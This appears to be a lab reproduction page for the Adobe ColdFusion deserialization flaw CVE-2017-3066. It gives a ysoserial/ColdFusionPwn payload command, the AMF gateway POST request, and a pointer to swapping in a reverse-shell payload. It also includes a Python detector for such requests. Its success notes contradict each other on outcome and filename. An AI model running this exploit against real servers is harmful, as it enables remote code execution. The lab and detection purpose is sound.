Awesome-POC/中间件漏洞/Adobe ColdFusion 反序列化漏洞 CVE-2017-3066.md
2024-11-06 14:10:36 +08:00

# Adobe ColdFusion Deserialization Vulnerability CVE-2017-3066
## Vulnerability description
Adobe ColdFusion is a dynamic web server product from the US company Adobe; the CFML (ColdFusion Markup Language) it runs is a programming language designed for web applications.
Adobe ColdFusion contains a Java deserialization vulnerability. An attacker can exploit it to execute arbitrary code in the context of the affected application or to cause a denial of service. Affected versions: Adobe ColdFusion (2016 release) Update 3 and earlier, ColdFusion 11 Update 11 and earlier, and ColdFusion 10 Update 22 and earlier.
References:
- https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html
- https://www.exploit-db.com/exploits/43993
- https://github.com/codewhitesec/ColdFusionPwn
## Environment setup
Start the vulnerable environment with Vulhub:
```
docker-compose up -d
```
Visit `http://your-ip:8500/CFIDE/administrator/index.cfm` and enter the password `vulhub` to complete the Adobe ColdFusion installation.
## Reproduction
Use the [ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn) tool from the references to generate the POC:
```
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/awesome_poc' poc.ser
```
The POC is written to the file poc.ser. Send it as the request body to `http://your-ip:8500/flex2gateway/amf` with Content-Type application/x-amf.
To place the POC in the request body in Burp Suite: right-click → Paste From File → select poc.ser:
```
POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853
[...poc...]
```
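The request above is the detection surface for this bug: a POST to the Flex AMF gateway whose AMF body carries a Java serialization stream, which the gateway hands to `ObjectInputStream`. The following is an added example (not from the original page or the ColdFusionPwn project) that classifies raw HTTP requests by that pattern; the Java stream magic `AC ED 00 05` is a standard constant, while the gadget-library marker (the library behind the page's `CommonsBeanutils1` chain) and the sample traffic are assumptions constructed for the example.

```python
# Header of every Java ObjectOutputStream: STREAM_MAGIC 0xACED, STREAM_VERSION 5.
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"
# Library behind the CommonsBeanutils1 chain used on the page (assumed marker string).
GADGET_MARKERS = (b"org.apache.commons.beanutils",)
# AMF gateway paths shipped with ColdFusion; the page targets /flex2gateway/amf.
AMF_PATHS = ("/flex2gateway/", "/flashservices/gateway", "/messagebroker/")


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify(raw: bytes):
    """Return findings for one request; an empty list means nothing suspicious."""
    method, path, headers, body = parse_request(raw)
    findings = []
    if method != "POST" or not path.lower().startswith(AMF_PATHS):
        return findings
    is_amf = headers.get("content-type", "").lower().startswith("application/x-amf")
    if JAVA_SER_MAGIC in body:
        # A Java serialization stream embedded in an AMF message is the vulnerable path:
        # the gateway deserializes it before any application-level validation runs.
        findings.append("java-serialized-object-in-amf-body")
        if not is_amf:
            findings.append("amf-gateway-post-without-x-amf-content-type")
    for marker in GADGET_MARKERS:
        if marker in body:
            findings.append("gadget-library-class-name:" + marker.decode())
    return findings


# Constructed sample traffic (not real captures): a benign AMF3 ping and an attempt.
BENIGN = (b"POST /flex2gateway/amf HTTP/1.1\r\nHost: cf.example\r\n"
          b"Content-Type: application/x-amf\r\n\r\n\x00\x03\x00\x00\x00\x01\x00\x04null")
SUSPECT = (b"POST /flex2gateway/amf HTTP/1.1\r\nHost: cf.example\r\n"
           b"Content-Type: application/x-amf\r\n\r\n\x00\x03" + JAVA_SER_MAGIC
           + b"sr\x00(org.apache.commons.beanutils.BeanComparator")

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, classify(raw) or "clean")
```

The same rule translates directly into a WAF or IDS signature; the fix itself is applying the vendor update for the affected versions listed above.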
**At this point the reproduction did not succeed: after uploading poc.ser and sending the POST, the /tmp/awesome_poc file was not created.**
**Addendum: this depends on the Burp Suite version; older versions of Burp Suite reproduce it successfully.**
**Reproducing with Burp Suite + Postman together also failed. The steps can be found at https://mp.weixin.qq.com/s/-6U2dOJs930kMYv7z-NUgg**
------
![](images/202202212052978.png)
Entering the container, `/tmp/success` has been created successfully:
![](images/202202212053950.png)
Changing the POC to a [reverse shell command](https://www.bugku.net/runtime-exec-payloads/) yields a shell:
![](images/202202212053074.png)